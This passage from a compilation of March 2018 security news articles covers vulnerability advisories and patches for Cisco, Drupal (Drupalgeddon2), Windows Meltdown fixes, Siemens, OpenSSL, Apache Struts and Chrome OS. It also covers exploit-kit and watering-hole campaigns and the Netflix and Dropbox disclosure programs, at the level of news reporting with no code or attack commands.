“The vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device”

IOS XE

The second vulnerability tracked as CVE-2018-0171 affects the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software, it could be exploited by an unauthenticated, remote attacker to cause a reload of a vulnerable device or to execute arbitrary code on an affected device.

“The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786.” reads the security advisory published by Cisco.

“A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts:

Triggering a reload of the device
Allowing the attacker to execute arbitrary code on the device
Causing an indefinite loop on the affected device that triggers a watchdog crash”
The third flaw affects the Cisco IOS XE Software is due to an undocumented user account “with privilege level 15” hat has a default username and password.

The issue tracked as CVE-2018-0150 could be exploited by an unauthenticated, remote attacker to log in to a device running an affected release of Cisco IOS XE Software with the default credentials.

“A vulnerability in Cisco IOS XE Software could allow an unauthenticated, remote attacker to log in to a device running an affected release of Cisco IOS XE Software with the default username and password that are used at initial boot.” reads the security advisory published by Cisco.

“The vulnerability is due to an undocumented user account with privilege level 15 that has a default username and password. An attacker could exploit this vulnerability by using this account to remotely connect to an affected device. A successful exploit could allow the attacker to log in to the device with privilege level 15 access.”


Drupal finally addressed the critical CVE-2018-7600 Drupalgeddon2 vulnerability
30.3.2018 securityaffairs
Vulnerebility

The Drupal development team has fixed the drupalgeddon2 vulnerability that could be exploited by an attacker to take over a website.
A few days ago, Drupal Security Team confirmed that a “highly critical” vulnerability, tracked as CVE-2018-7600, affects Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by the Drupal developers Jasper Mattsson.

Both Drupal 8.3.x and 8.4.x are not supported, but due to the severity of the flaw the Drupal Security Team decided to address it with specific security updates.

Now the Drupal development team has fixed the vulnerability that could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing an URL.

The Drupal CMS currently runs on over one million websites, it is the second most popular content management system behind WordPress.

Website administrators should immediately upgrade their sites to Drupal 7.58 or Drupal 8.5.1.

The flaw was dubbed Drupalgeddon2 after the CVE-2014-3704 Drupalgeddon security vulnerability that was discovered in 2014 that was exploited in numerous successful attacks in the wild.

The good news is that at the time there is no public proof-of-concept code available online.

The Drupal security team declared that it was not aware of any attacks exploiting the Drupalgeddon2 vulnerability in the wild.
“A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.” reads the security advisory published by Drupal.

“The security team has written an FAQ about this issue. Solution:

Upgrade to the most recent version of Drupal 7 or 8 core.

If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)”
Patching the websites it essential, the popular expert Kevin Beaumont noticed that the Drupal homepage was taken down for half an hour to address the Drupalgeddon2.

Kevin Beaumont, Actual Porg 👻

@GossiTheDog
The Drupal team took the site offline before the announcement to do a version upgrade, and now the site doesn’t work 😃💃🏽

9:52 PM - Mar 28, 2018 · Manchester, England
13
See Kevin Beaumont, Actual Porg 👻's other Tweets
Twitter Ads info and privacy
The Drupal team also issued security patches for the 6.x versions that were discontinued in February 2016.

“This issue also affects Drupal 6. Drupal 6 is End of Life. For more information on Drupal 6 support please contact a D6LTS vendor.” continues the advisory.


Microsoft Patches for Meltdown Introduced Severe Flaw: Researcher
30.3.2018 securityweek
Vulnerebility

Some of the Windows updates released by Microsoft to mitigate the Meltdown vulnerability introduce an even more severe security hole, a researcher has warned.

Microsoft has released patches for the Meltdown and Spectre vulnerabilities every month since their disclosure in January. While at this point the updates should prevent these attacks, a researcher claims some of the fixes create a bigger problem.

According to Ulf Frisk, the updates released by Microsoft in January and February for Windows 7 and Windows Server 2008 R2 patch Meltdown, but they allow an attacker to easily read from and write to memory.

He noted that while Meltdown allows an attacker to read megabytes of data per second, the new vulnerability can be exploited to read gigabytes of data per second – in one of the tests he conducted, the expert managed to access the memory at speeds of over 4 Gbps. Moreover, the flaw also makes it possible to write to memory.

Frisk says exploitation does not require any sophisticated exploits – standard read and write instructions will get the job done – as Windows 7 has already mapped the memory for each active process.

“In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself,” the researcher explained. “The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM.”

“Once read/write access has been gained to the page tables it will be trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization. All one have to do is to write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory,” he said.

The researcher says anyone can reproduce the vulnerability using a direct memory access (DMA) attack tool he developed a few years ago. The attack works against devices running Windows 7 x64 or Windows Server 2008 R2 with the Microsoft patches from January or February installed. The issue did not exist before January and it appears to have been addressed by Microsoft with the March updates. Windows 10 and Windows 8.1 are not affected, Frisk said.

A Microsoft spokesperson told SecurityWeek that the company is aware of the report and is looking into it.

Frisk previously discovered a macOS vulnerability that could have been exploited to obtain FileVault passwords, and demonstrated some UEFI attacks.


Drupalgeddon: Highly Critical Flaw Exposes Million Drupal Websites to Attacks
30.3.2018 securityweek
Vulnerebility

All versions of the Drupal content management system are affected by a highly critical vulnerability that can be easily exploited to take complete control of affected websites in what may turn out to be Drupalgeddon 2.0.

While analyzing the security of Drupal, Jasper Mattsson discovered a serious remote code execution flaw that impacts versions 6, 7 and 8. This represents more than one million websites that can be hacked by a remote and unauthenticated attacker.

The security hole, tracked as CVE-2018-7600 and assigned a risk score of 21/25, can be exploited simply by accessing a page on the targeted Drupal website. Once exploited, it gives the attacker full control over a site, including access to non-public data and the possibility to delete or modify system data, Drupal developers warned.

The vulnerability has been patched with the release of Drupal 7.58, 8.5.1, 8.3.9 and 8.4.6. While Drupal 6 has reached end of life and it’s not supported since February 2016, a fix has still been developed due to the severity of the flaw and the high risk of exploitation.

Besides updating their installations to the latest version, users can protect their websites against attacks by making some changes to the site’s configuration. However, the required changes are “drastic.”

“There are several solutions, but they are all based on the idea of not serving the vulnerable Drupal pages to visitors. Temporarily replacing your Drupal site with a static HTML page is an effective mitigation. For staging or development sites you could disable the site or turn on a ‘Basic Auth’ password to prevent access to the site,” Drupal developers said.

Cloudflare also announced that it has pushed out a rule to its Web Application Firewall (WAF) to block potential attacks.

While no technical details have been made public, Drupal believes that exploits targeting the vulnerability will be created within hours or days, which is why it alerted users of the flaw and an upcoming patch one week in advance. This appears to have been a good strategy, but many websites may still remain vulnerable for extended periods of time.

Drupal patches critical remote code execution vulnerability

In the case of the notorious Drupalgeddon vulnerability, hackers had used it to take control of websites nearly two years after a patch was released.

While there haven’t been many reports of Drupal flaws being exploited in the wild since Drupalgeddon, one of the vulnerabilities patched in June 2017 by the developers of the CMS had been leveraged in some spam campaigns.


Microsoft Patches for Meltdown Introduced Severe Flaw: Researcher
28.3.2018 securityweek
Vulnerebility

Some of the Windows updates released by Microsoft to mitigate the Meltdown vulnerability introduce an even more severe security hole, a researcher has warned.

Microsoft has released patches for the Meltdown and Spectre vulnerabilities every month since their disclosure in January. While at this point the updates should prevent these attacks, a researcher claims some of the fixes create a bigger problem.

According to Ulf Frisk, the updates released by Microsoft in January and February for Windows 7 and Windows Server 2008 R2 patch Meltdown, but they allow an attacker to easily read from and write to memory.

He noted that while Meltdown allows an attacker to read megabytes of data per second, the new vulnerability can be exploited to read gigabytes of data per second – in one of the tests he conducted, the expert managed to access the memory at speeds of over 4 Gbps. Moreover, the flaw also makes it possible to write to memory.

Frisk says exploitation does not require any sophisticated exploits – standard read and write instructions will get the job done – as Windows 7 has already mapped the memory for each active process.

“In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself,” the researcher explained. “The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM.”

“Once read/write access has been gained to the page tables it will be trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization. All one have to do is to write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory,” he said.

The researcher says anyone can reproduce the vulnerability using a direct memory access (DMA) attack tool he developed a few years ago. The attack works against devices running Windows 7 x64 or Windows Server 2008 R2 with the Microsoft patches from January or February installed. The issue did not exist before January and it appears to have been addressed by Microsoft with the March updates. Windows 10 and Windows 8.1 are not affected, Frisk said.

SecurityWeek has reached out to Microsoft for comment and will update this article if the company responds.

Frisk previously discovered a macOS vulnerability that could have been exploited to obtain FileVault passwords, and demonstrated some UEFI attacks.


Critical Flaws Found in Siemens Telecontrol, Building Automation Products
28.3.2018 securityweek
Vulnerebility

Siemens informed customers this week that critical vulnerabilities have been found in some of its telecontrol and building automation products, and revealed that some SIMATIC systems are affected by a high severity flaw.

One advisory published by the company describes several critical and high severity flaws affecting Siveillance and Desigo building automation products. The security holes exist due to the use of a vulnerable version of a Gemalto license management system (LMS).

The bugs affect Gemalto Sentinel LDK and they can be exploited for remote code execution and denial-of-service (DoS) attacks.

The vulnerabilities were discovered by researchers at Kaspersky Lab and disclosed in January. The security firm warned at the time that millions of industrial and corporate systems may be exposed to remote attacks due to their use of the vulnerable Gemalto product.

Siemens warned at the time that more than a dozen versions of the SIMATIC WinCC Add-On were affected. The company has now informed customers that some of its building automation products are impacted as well, including Siveillance Identity and SiteIQ Analytics, and Desigo XWP, CC, ABT, Configuration Manager, and Annual Shading.

The German industrial giant has advised customers to update the LMS to version 2.1 SP4 (2.1.681) or newer in order to address the vulnerabilities.

A separate advisory published by Siemens this week informs customers of a critical vulnerability affecting TIM 1531 IRC, a communication module launched by the company nearly a year ago. The module connects remote stations based on SIMATIC controllers to a telecontrol control center through the Sinaut ST7 protocol.

“A remote attacker with network access to port 80/tcp or port 443/tcp could perform administrative operations on the device without prior authentication. Successful exploitation could allow to cause a denial-of-service, or read and manipulate data as well as configuration settings of the affected device,” Siemens explained.

The company said there had been no evidence of exploitation when it published its advisory on Tuesday.

A third advisory published by Siemens this week describes a high severity flaw discovered by external researchers in SIMATIC PCS 7, SIMATIC WinCC, SIMATIC WinCC Runtime Professional, and SIMATIC NET PC products.

The vulnerability allows an attacker to cause a DoS condition on the impacted products by sending specially crafted messages to their RPC service. Patches or mitigations have been made available by Siemens for each of the affected systems.


The Top Vulnerabilities Exploited by Cybercriminals
27.3.2018 securityweek
Vulnerebility

Cybercriminals are shifting their focus from Adobe to Microsoft consumer products, and are now concentrating more on targeted attacks than on web-based exploit kits.

Each year, Recorded Future provides an analysis of criminal chatter on the dark web in its Top Ten Vulnerabilities Report. It does this because it perceives a weakness in traditional vulnerability databases and scanning tools -- they do not indicate which vulnerabilities are currently being exploited, nor to what extent. Reliance on vulnerability lists alone cannot say where patching and remediation efforts should be prioritized.

"We do this analysis because the sale and use of exploits is a for-profit industry," Recorded Future's VP of technical solutions, Scott Donnelly told SecurityWeek. This means that exploit developers have to sell their products, while other criminals have to buy them -- and this leads to the chatter that Recorded Future analyzes.

"If you're a cybercriminal trying to make money, you have to discuss it. If you hold back too much you're not going to make any money; so, there's a necessity for the criminals to stick their heads up a little bit -- and we can take advantage of that and call out some of the big conversations." It assumes a correlation between chatter about a vulnerability with active exploitation of that vulnerability -- an assumption that common sense rather than science suggests is reasonable.

Donnelly is confident that his firm's knowledge of and access to the dark web is statistically valid. Nation-state activity is specifically excluded from this analysis, because, he says, "If you're a nation-state with an exploit, or if you're a third-party supplier of exploits to a nation state, you're less likely to talk about it in a general criminal forum."

At the macro level, this year's analysis highlights a move away from Adobe vulnerabilities towards Microsoft consumer product vulnerabilities. While Flash exploits have dominated earlier annual reports, seven of the top ten (including the top five) most discussed vulnerabilities are now Microsoft vulnerabilities. "As Adobe Flash Player has begun to see its usage significantly drop, this year we find that it's a lot of Microsoft consumer products that are seeing heavy exploitation," says Donnelly.

The three most used vulnerabilities are CVE-2017-0199 (which allows attackers to download and execute a Visual Basic script containing PowerShell commands from a malicious document), CVE-2016-0189 (which is an old Internet Explorer vulnerability that allows attackers to use an exploit kit to drop malware, such as ransomware), and CVE-2017-0022 (which enables data theft).

A second major takeaway from the analysis is that 2017 has seen a significant drop in the development of new exploit kits. "This has been noticed before," Donnelly told SecurityWeek, "but mainly because researchers simply haven't seen them in action. This is now evidence that the criminals themselves aren't talking about or trying to sell that many new kits."

In raw numbers, Recorded Future's analysis noted 26 new kits in 2016, but only 10 new kits in 2017 (from a total list of 158 EKs). "The observed drop in exploit kit activity," suggests Donnelly, "overlaps with the rapid decline of Flash Player usage. Users have shifted to more secure browsers, and attackers have shifted as well. Spikes in cryptocurrency mining malware and more targeted victim attacks have filled the void."

At the micro level, the big takeaway from this report is the anomalous position of CVE-2017-0022. It is the third most discussed vulnerability on the dark web forums, yet in relation to just two pieces of malware: exploit kits Astrum (aka Stegano) and Neutrino. This is the lowest number of associated malware in the top ten vulnerabilities -- both of the two more popular vulnerabilities are associated with ten different peices of malware. CVE-2017-0199 is associated with malware including Hancitor, Dridex and FinFisher, while CVE-2016-0189 is associated with nine different exploit kits and the Magniber ransomware.

But it's not just in malware associations that CVE-2017-0022 is anomalous. It has a Common Vulnerability Scoring System (CVSS) rating of just 4.3. The next lowest rating in the top ten vulnerabilities is 7.6, while the top two are rated at 9.3 and 7.6. CVSS defines a 4.3 score as medium risk; and yet Recorded Future's research shows it to be the third most exploited vulnerability, commenting, "'In the wild' severity does not always correlate with the Common Vulnerability Scoring System (CVSS) score."

This is a prime example of the reason for the analysis. Security teams could check the CVSS score and conclude on this evidence alone that the vulnerability does not require expedited remediation or patching. As the third most exploited vulnerability, Recorded Future's latest threat analysis suggests otherwise.

Boston, Mass.-based Recorded Future raised $25 million in a Series E funding round led by Insight Venture Partners in October 2017 -- bringing the total funding raised to $57.9 million.


New "ThreadKit" Office Exploit Builder Emerges
27.3.2018 securityweek
Vulnerebility

A newly discovered Microsoft Office document exploit builder kit has been used for the distribution of a variety of malicious payloads, including banking Trojans and backdoors, Proofpoint reports.

The exploit builder kit was initially discovered in October 2017, but Proofpoint's researchers have linked it to activity dating back to June 2017. The builder kit shows similarities to Microsoft Word Intruder (MWI), but is a new tool called ThreadKit.

In June 2017, the kit was being advertised in a forum post as being able to create documents with embedded executables and embedded decoy documents, and several campaigns featuring such documents were observed that month. The documents would perform an initial check-in to the command and control (C&C) server, a tactic also used by MWI.

The documents were targeting CVE-2017-0199 and were focused on downloading and executing a HTA file that would then download the decoy and a malicious VB script to extract and run the embedded executable. The payload was Smoke Loader, which in turn downloaded banking malware.

In October, ThreadKit started targeting CVE 2017-8759 as well, but continued to use the initial C&C check-in and the HTA file to execute the embedded executable, Proofpoint says. However, changes were made to the manner in which the exploit documents operate and new exploits were integrated as well.

In November, ThreadKit was quick to incorporate exploits for new Microsoft Office vulnerabilities, and started being advertised as capable of targeting CVE 2017-11882 too. Soon after, campaigns that featured the previously observed check-in already started to emerge.

In February and March 2018, the kit was embedding new exploits, targeting vulnerabilities such as an Adobe Flash zero-day (CVE-2018-4878) and several new Microsoft office vulnerabilities, including CVE-2018-0802 and CVE-2017-8570.

At the same time, the researchers noticed a large spike in email campaigns featuring ThreadKit-generated Office attachments packing these exploits. The exploits appear copied from proofs of concept available on a researcher’s GitHub repo.

As part of these attacks, the attachments would drop the contained packager objects into the temp folder, then the exploits would execute the dropped scriptlet file, thus leading to the execution of the dropped batch files, which in turn run the executable.

Proofpoint found that not all ThreadKit documents contain a valid URL for the statistics check-in (some contain placeholder URLs). Furthermore, not all documents followed the same execution chain, with some scripts modified to perform other actions, a customization that may be provided as a service by the kit author.

“In 2017, several new vulnerabilities entered regular use by threat actors and the first months of 2018 have added to that repertoire. Document exploit builder kits like ThreadKit enable even low-skilled threat actors to take advantage of the latest vulnerabilities to distribute malware. Organizations and individuals can mitigate the risk from ThreadKit and other document exploit-based attacks by ensuring that clients are patched for the latest vulnerabilities in Microsoft office and other applications,” Proofpoint concludes.


First OpenSSL Updates in 2018 Patch Three Flaws
27.3.2018 securityweek
Vulnerebility

The first round of security updates released in 2018 for OpenSSL patch a total of three vulnerabilities, but none of them appears to be serious.

OpenSSL versions 1.1.0h and 1.0.2o patch CVE-2018-0739, a denial-of-service (DoS) vulnerability discovered using Google’s OSS-Fuzz service, which has helped find several flaws in OpenSSL in the past period.

The security hole, rated “moderate,” is related to constructed ASN.1 types with a recursive definition.

“Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion,” the OpenSSL Project said in its advisory.

Another moderate severity flaw, which only affects the 1.1.0 branch, is CVE-2018-0733. This is an implementation bug in the PA-RISC CRYPTO_memcmp function, and it allows an attacker to forge authenticated messages easier than it should be.

The OpenSSL Project learned about this vulnerability in early March from IBM. Only HP-UX PA-RISC systems are impacted.

Finally, OpenSSL 1.1.0h fixes an overflow bug that could allow an attacker to access TLS-protected communications. The vulnerability, CVE-2017-3738, was first disclosed in December 2017, but since an attack is not easy to carry out the issue has been assigned a low severity rating and it has only been patched now.

Four rounds of security updates were released for OpenSSL last year, and only one of the eight fixed vulnerabilities was classified as high severity.


Experts uncovered a watering hole attack on leading Hong Kong Telecom Site exploiting CVE-2018-4878 flaw
27.3.2018 securityaffairs
Vulnerebility

Researchers at Morphisec have uncovered a watering hole attack on leading Hong Kong Telecom website exploiting the CVE-2018-4878 flash vulnerability.
Security experts at Morphisec have discovered a watering hole attack on leading Hong Kong Telecom website exploiting the CVE-2018-4878 flash vulnerability.

In a watering hole attack, hackers infect the websites likely to be visited by their targeted victims, this technique requires more effort than common spear-phishing attack and it is usually associated with APT groups.

watering hole HonkKong hacked site-blanked

Early February, Adobe rolled out an emergency patch that fixed two critical remote execution vulnerabilities, including the CVE-2018-4878, after North Korea’s APT group was spotted exploiting it in targeted attacks.

At the time, South Korea’s Internet & Security Agency (KISA) warned of a Flash zero-day vulnerability (CVE-2018-4878) that has reportedly been exploited in attacks by North Korea’s hackers.

By the end of February, the researchers at Morphisec reported that threat actors were exploiting the use-after-free flaw to deliver malware.

“On March 21,2018, Morphisec Labs began investigating the compromised website of a leading Hong Kong Telecommunications company after being alerted to it by malware hunter @PhysicalDrive0.” reads the analysis published by Morphisec.

“The investigation, conducted by Morphisec researchers Michael Gorelik and Assaf Kachlon, determined that the Telecom group’s corporate site had indeed been hacked. Attackers added an embedded Adobe Flash file that exploits the Flash vulnerability CVE-2018-4878 on the main home.php page. The attack is a textbook case of a watering hole attack.”

Threat actors behind the attack uncovered by the experts adopted advanced evasive techniques, they used a purely fileless malicious code, without persistence or any trace on the disk. It is interesting to note also the usage of a custom protocol over the 443 port.

The Flash exploit used in this attack was similar to the one involved in the attacks involving the CVE-2018-4878 vulnerability, but it employs a different shellcode executed post exploitation.

“Generally, this advanced type of watering hole attack is highly targeted in nature and suggests that a very advanced group is behind it,” continues the post.

“The Flash exploit that was delivered has a high degree of similarity to the previously published analysis of the CVE-2018-4878. The major difference in this exploit is in the shellcode that is executed post exploitation”

The shellcode executes rundll32.exe and overwrites the content of the memory with a malicious code that was designed to download additional code directly into the memory of the rundll32 process.

The additional code downloaded directly into the memory of the rundll32 process includes Metasploit Meterpreter and Mimikatz modules.

The analysis of the modules revealed that were compiled on February 15, a few days before the attack.

“As our analysis shows, this watering hole attack is of advanced evasive nature. Being purely fileless, without persistence or any trace on the disk, and the use of custom protocol on a non-filtered port, makes it a perfect stepping stone for a highly targeted attack chain. This clearly suggests that very advanced threat actors are responsible for it,” Morphisec says.

The experts noticed that despite the advanced evasive features, the attack used basic Metasploit framework components that were compiled just before the attack and did not show any sophistication, obfuscation or evasion.

At this time, the company hasn’t attributed the attack to a specific threat actor, it is still investigating the incident.


Drupal to Patch Highly Critical Vulnerability This Week
26.3.2018 securityweek
Vulnerebility

Drupal announced plans to release a security update for Drupal 7.x, 8.3.x, 8.4.x, and 8.5.x on March 28, 2018, aimed at addressing a highly critical vulnerability.

The Drupal security team hasn’t provided information on the vulnerability and says it won’t release any details on it until the patch arrives. An advisory containing all the necessary information will be published on March 28.

Before that, however, the team advises customers to be prepared for the update’s release and to apply it immediately after it is published, given its high exploitation potential.

“The Drupal Security Team urges you to reserve time for core updates at that time because exploits might be developed within hours or days,” Drupal announced.

The highly popular content management system (CMS) powers over one million sites and is used by a large number of e-commerce businesses.

Due to the widespread use of Drupal, currently the second most used CMS after WordPress, the security update will be released for Drupal versions 8.3.x and 8.4.x as well, although they are no longer supported.

“While […] we don't normally provide security releases for unsupported minor releases, given the potential severity of this issue, we are providing 8.3.x and 8.4.x releases that include the fix for sites which have not yet had a chance to update to 8.5.0,” Drupal says.

The Drupal security team urges customers to update to the appropriate release for their CMS version as soon as it is made available on March 28.

Thus, sites on 8.3.x should be updated to the upcoming 8.3.x iteration and then to the latest 8.5.x security release in the next month, while sites on 8.4.x should apply the next 8.4.x release and then upgrade to 8.5.x as well.

All sites on Drupal versions 7.x or 8.5.x should immediately apply the update when the advisory is released, using the normal update methods.

All of the appropriate version numbers for the impacted Drupal 8 branches will be listed in the upcoming advisory.

“Your site's update report page will recommend the 8.5.x release even if you are on 8.3.x or 8.4.x, but temporarily updating to the provided backport for your site's current version will ensure you can update quickly without the possible side effects of a minor version update,” Drupal also notes.


One Year Later, Hackers Still Target Apache Struts Flaw
26.3.2018 securityweek
Vulnerebility

One year after researchers saw the first attempts to exploit a critical remote code execution flaw affecting the Apache Struts 2 framework, hackers continue to scan the Web for vulnerable servers.

The vulnerability in question, tracked as CVE-2017-5638, affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10. The security hole was addressed on March 6, 2017 with the release of versions 2.3.32 and 2.5.10.1.

The bug, caused due to improper handling of the Content-Type header, can be triggered when performing file uploads with the Jakarta Multipart parser, and it allows a remote and unauthenticated attacker to execute arbitrary OS commands on the targeted system.

The first exploitation attempts were spotted one day after the patch was released, shortly after someone made available a proof-of-concept (PoC) exploit. Some of the attacks scanned servers in search of vulnerable Struts installations, while others were set up to deliver malware.

Guy Bruneau, researcher and handler at the SANS Internet Storm Center, reported over the weekend that his honeypot had caught a significant number of attempts to exploit CVE-2017-5638 over the past two weeks.

The expert said his honeypot recorded 57 exploitation attempts on Sunday, on ports 80, 8080 and 443. The attacks, which appear to rely on a publicly available PoC exploit, involved one of two requests designed to check if a system is vulnerable.

Bruneau told SecurityWeek that he has yet to see any payloads. The researcher noticed scans a few times a week starting on March 13, coming from IP addresses in Asia.

“The actors are either looking for unpatched servers or new installations that have not been secured properly,” Bruneau said.

The CVE-2017-5638 vulnerability is significant as it was exploited by cybercriminals last year to hack into the systems of U.S. credit reporting agency Equifax. Attackers had access to Equifax systems for more than two months and they managed to obtain information on over 145 million of the company’s customers.

The same vulnerability was also leveraged late last year in a campaign that involved NSA-linked exploits and cryptocurrency miners.

This is not the only Apache Struts 2 vulnerability exploited by malicious actors since last year. In September, security firms warned that a remote code execution flaw tracked as CVE-2017-9805 had been exploited to deliver malware.


A “highly critical” flaw affects Drupal 7 and 8 core, Drupal security updates expected on March 28th
23.3.2018 securityweek
Vulnerebility

Drupal Security Team confirmed that a “highly critical” vulnerability affects Drupal 7 and 8 core and announced the availability of security updates on March 28th.
A “highly critical” vulnerability affects Drupal 7 and 8 core and Drupal developers are currently working to address it.

Drupal maintainers initially planned to issue a security release of Drupal 7.x, 8.3.x, 8.4.x, and 8.5.x on March 28th 2018 between 18:00 – 19:30 UTC.

The security team asked to reserve time for core updates fearing that threat actors could exploit the “highly critical security vulnerability.”

“There will be a security release of Drupal 7.x, 8.3.x, 8.4.x, and 8.5.x on March 28th 2018 between 18:00 – 19:30 UTC, one week from the publication of this document, that will fix a highly critical security vulnerability.” reads the advisory sent to the developers.

“The Drupal Security Team urges you to reserve time for core updates at that time because exploits might be developed within hours or days. “

Both Drupal 8.3.x and 8.4.x are not supported, but due to the severity of the flaw the Drupal Security Team decided to address it with specific security updates.

The Drupal CMS currently runs on over one million websites, it is the second most popular content management system behind WordPress.

“While Drupal 8.3.x and 8.4.x are no longer supported and we don’t normally provide security releases for unsupported minor releases, given the potential severity of this issue, we areproviding 8.3.x and 8.4.x releases that include the fix for sites which have not yet had a chance to update to 8.5.0.” continues the advisory.

The Drupal security team strongly recommends the following:

Sites on 8.3.x should immediately update to the 8.3.x release that will be provided in the advisory, and then plan to update to the latest 8.5.x security release in the next month.
Sites on 8.4.x should immediately update to the 8.4.x release that will be provided in the advisory, and then plan to update to the latest 8.5.x security release in the next month.
Sites on 7.x or 8.5.x can immediately update when the advisory is released using the normal procedure.


Google is distributing more Meltdown and Spectre Patches for Chrome OS devices
23.3.2018 securityweek
Vulnerebility

Google announced that mitigations for devices with Intel processors that are affected by the Spectre and Meltdown vulnerabilities will be available for latest stable channel update for Google’s Chrome OS operating system.
The Meltdown and Spectre attacks could be exploited by attackers to bypass memory isolation mechanisms and access target sensitive data.

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

The Meltdown exploits the speculative execution to breach the isolation between user applications and the operating system, in this way any application can access all system memory.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Meltdown attacks trigger the CVE-2017-5754 vulnerability, while Spectre attacks the CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). According to the experts, only Meltdown and Spectre Variant 1 can be addressed via software, while Spectre Variant 2 required an update of the microcode for the affected processors. Software mitigations include.

Google addressed the Meltdown issue in Chrome OS with the release of the version 63 in December, tens of days before researchers at Google Project Zero disclosure the flaws.

Chrome OS Spectre patches

Google rolled out the KPTI/KAISER patch to address the flaw in 70 Intel-based Chromebook models from various vendors, including Acer, ASUS, Dell, HP, Lenovo, and Samsung.

This week the company released Chrome OS 65 release that also includes the KPTI mitigation against Meltdown for a number of Intel-based systems that were not addressed in with version 3.14 of the kernel.

According to Google, all older Chromebooks with Intel processors should get the KPTI mitigation for Meltdown with the release of Chrome OS 66 that is scheduled for release on April 24.

“The Stable channel has been updated to 65.0.3325.167 (Platform version: 10323.58.0/1) for most Chrome OS devices. This build contains a number of bug fixes and security updates.” reads the Google announcement.

“Intel devices on 3.14 kernels received the KPTI mitigation against Meltdown with Chrome OS 65.

All Intel devices received the Retpoline mitigation against Spectre variant 2 with Chrome OS 65.”

Chrome OS 65 also includes the Retpoline mitigation for Spectre Variant 2 for all Intel-based devices. Google experts highlighted that for Spectre Variant 1 attack, hackers can abuse the eBPF feature in the Linux kernel, but Chrome OS disables eBPF.

Chrome OS devices running on ARM-based systems are not affected by Meltdown. Google is working to cover also Spectre issues.

“On ARM devices we’ve started integrating firmware and kernel patches supplied by ARM. Development is still ongoing so release timelines have not been finalized. ARM devices will receive updated firmware and kernels before they enable virtualization features.” concluded Google.


Netflix Launches Public Bug Bounty Program
22.3.2018 securityweek
Vulnerebility

Netflix announced on Wednesday the launch of a public bug bounty program with rewards of up to $15,000, and Dropbox has made some changes to its vulnerability disclosure policy, promising not to sue researchers.

Netflix has had a vulnerability disclosure policy for the past 5 years and a private bug bounty program since September 2016. The company has now decided to make its bug bounty initiative public through the Bugcrowd platform.

Its vulnerability disclosure policy and private bug bounty have helped Netflix patch 190 vulnerabilities. The private program started with 100 of Bugcrowd’s top researchers, but more than 700 white hat hackers were later invited in preparation for the public program.

Researchers can earn between $100 and $15,000 for flaws affecting one of several Netflix domains and the mobile applications for iOS and Android. The company claims the highest reward paid out to date is $15,000 for a critical security hole.

The types of vulnerabilities that can be submitted include cross-site scripting (XSS), cross-site request forgery (CSRF), SQL injection, authentication and authorization, data exposure, remote code execution, redirection, business logic, MSL protocol, and mobile API issues. Netflix says it acknowledges vulnerability reports, on average, in less than 3 days.

“Engineers at Netflix have a high degree of ownership for the security of their products and this helps us address reports quickly,” Netflix said in a blog post. “Our security engineers also have the autonomy and freedom to make reward decisions quickly based on the reward matrix and bug severity. This ultimately helps create an efficient and seamless experience for researchers which is important for engagement in the program.”

Dropbox makes changes to vulnerability disclosure policy

Dropbox has not set a maximum amount of money that researchers can earn through its HackerOne-based bug bounty program. To date, the company has paid out more than $200,000 for over 220 vulnerabilities.

However, the changes made by the company are not related to bounty amounts and instead they focus on the vulnerability disclosure policy and assuring researchers that they will not get sued even if they accidentally violate terms of the program.

Several researchers have faced lawsuits recently over vulnerability disclosures, and Dropbox wants to help avoid such situations. The company has promised “to not initiate legal action for security research conducted pursuant to the policy, including good faith, accidental violations.”

Dropbox says it will allow researchers to publish the details of the vulnerabilities they find, and will not file Digital Millennium Copyright Act (DMCA) action against them as long as their activities are consistent with the company’s vulnerability disclosure policy.

The new policy includes a clear statement that research constitutes “authorized conduct” under the controversial Computer Fraud and Abuse Act (CFAA). Furthermore, as long as the researcher complies with Dropbox’s policy, the company will clearly state that their actions were authorized in case of a lawsuit initiated by a third party.

“We’re also happy to announce that all of the text in our VDP is a freely copyable template,” Dropbox said. “We’ve done this because we’d like to see others take a similar approach. We’ve put some effort in to this across our legal and security teams and if you like what you see, please use it.”


More Chrome OS Devices Receive Meltdown, Spectre Patches
22.3.2018 securityweek
Vulnerebility

The latest stable channel update for Google’s Chrome OS operating system includes mitigations for devices with Intel processors affected by the Spectre and Meltdown vulnerabilities.

